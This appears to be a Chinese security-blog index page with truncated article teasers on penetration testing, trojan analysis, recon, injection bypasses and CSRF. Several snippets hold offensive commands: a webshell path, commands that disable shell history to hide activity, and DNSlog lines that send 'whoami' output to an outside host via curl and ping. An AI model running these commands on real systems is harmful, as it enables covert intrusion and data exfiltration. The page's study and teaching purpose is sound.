shell:xxx.xxxx/data/thumb/44/ed/44ed1732a7e550e7a8874943fc774bad_100_100_.php测试。。摘自:https:...
浅析通过'监控'来辅助进行漏洞挖掘
这篇文章总结了一些笔者个人在漏洞挖掘这一块的”姿势”,看了下好像也没相关类似TIPs或者文章出现,就写下此文。
一个文件,百种名称,百种行为:“百家”木马集团分析
近日,腾讯反病毒实验室拦截到一批伪装成客户通知单的木马,该木马会根据自身文件名的不同而进行多种不同的恶意行为,经测试,目前国内的多款杀毒软件尚不能查杀该病毒,多个木马的变种MD5被...
通用文件扫描器scan_bak.py
这个脚本主要针对 网站目录和文件进行备份扫描。 例如 index.php 会扫描 index.php.bak这类的文件,目录 例如 xxx.com/data 它就会这样...
Linux 入侵检测技巧知识
1. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/...
虚拟主机中利用php.exe来跨站
虚拟主机小技巧 看到现在很多同学在发帖了,https://www.t00ls.net/viewthread ... p;extra=&page=1
学员渗透录十三 base64变形注入+hex编码绕过
学员渗透录十三 base64变形注入 +hex编码绕过 作者:M-7N10 AD:学渗透 找暗月,暗月 欢迎你的加入。
Ubuntu常用命令大全
查看软件xxx安装内容 #dpkg -L xxx查找软件 #apt-cache search 正则表达式 查找文件属于哪个包 #dpkg -S filename apt-file ...
【渗透技巧】资产探测与信息收集
一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一...
记一次webshell的获取
首先祝大家节日快乐,给大家的礼物就是下文啦。本文转自:先知社区链接:https://xz.aliyun.com/t/6587 像往常一样闲来无事挖src,打开http://t.xxx.com.cn开局...
DNSlog攻击技巧
linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换...
浅谈CSRF
CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XS...
22